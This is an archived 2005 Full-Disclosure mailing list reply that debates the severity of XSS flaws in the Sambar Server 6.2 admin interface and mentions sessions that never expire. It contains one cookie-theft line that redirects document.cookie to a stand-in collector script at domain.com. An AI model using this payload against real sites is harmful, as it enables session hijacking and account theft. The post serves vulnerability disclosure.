[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] XSS in Sambar Server version 6.2

To: Daniel <deeper@xxxxxxxxx>
Subject: Re: [Full-disclosure] XSS in Sambar Server version 6.2
From: jamie fisher <contact_jamie_fisher@xxxxxxxxxxx>
Date: Tue, 24 May 2005 21:30:13 +0100 (BST)

"A user can input a specially crafted script that when rendered by the
application..."

Hopefully you can explain:

"Multiple XSS found in the administrative interface."

>>  This kind of pre-supposes the idea that a user has access to the 
>> administrative interface.  The tests I ran were purely looking at what 
>> somebody with priviliged rights could have effected within the application.  
>> For clarification, a user is by default somebody who is "identified" and 
>> then "authorised" to the system.  In the case of Sambar Server version 6.2 
>> this is done through the mandatory access control of username and password.  
>> The system in this case is the "administrative interface".

Granted, the XSS is a very low level vulnerability.  However, combine the XSS 
with the ability to (document.cookie) and a 
document.location="http://domain.com/cookiecollector.pl"; which logs the users 
cookie then this becomes more of an issue.  Incidentally, did you know the 
application does not expire session states, i.e., if I log off or kill my 
session with the browser or otherwise and a miscreant (somebody who uses a Lynx 
browser) , e.g., You, conspires to obtain my user identity - in this case we're 
using the example of the cookie - then certainly this issue certainly becomes 
one of a high level issue.

>From personal experience I know you've run across plenty of XSS issues before, 
>we've both discussed where we've collided in previous job roles.  I guess, in 
>a nut shell it shows how little input/output validation is occuring throughout 
>the application and what a user if so inclined, can force the application into 
>rendering.  But really, I used to point out input/output validation issues to 
>you along with the other stuff you used to miss in your web application pen 
>tests.
 
P.S. There'll be plenty of other issues (other than XSS) I'll publish re: 
Sambar Server 6.2.  I haven't got a problem if you would like to work with me 
in researching bugs/problems/issues.  It's just a matter of trying to work with 
the vendor to help find understand the issues/apply a patch.  And btw, this 
isn't a personal attack against you either =)
 
J


                
---------------------------------
Does your mail provider give you FREE antivirus protection? 
Get Yahoo! Mail

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] XSS in Sambar Server version 6.2
  - From: Daniel

References:
- Re: [Full-disclosure] XSS in Sambar Server version 6.2
  - From: Daniel

Prev by Date: [Full-disclosure] iDEFENSE Security Advisory 05.24.05: Ipswitch IMail IMAP SELECT Command DoS Vulnerability
Next by Date: [Full-disclosure] KIBUV.B or variant?
Previous by thread: Re: [Full-disclosure] XSS in Sambar Server version 6.2
Next by thread: Re: [Full-disclosure] XSS in Sambar Server version 6.2
Index(es):
- Date
- Thread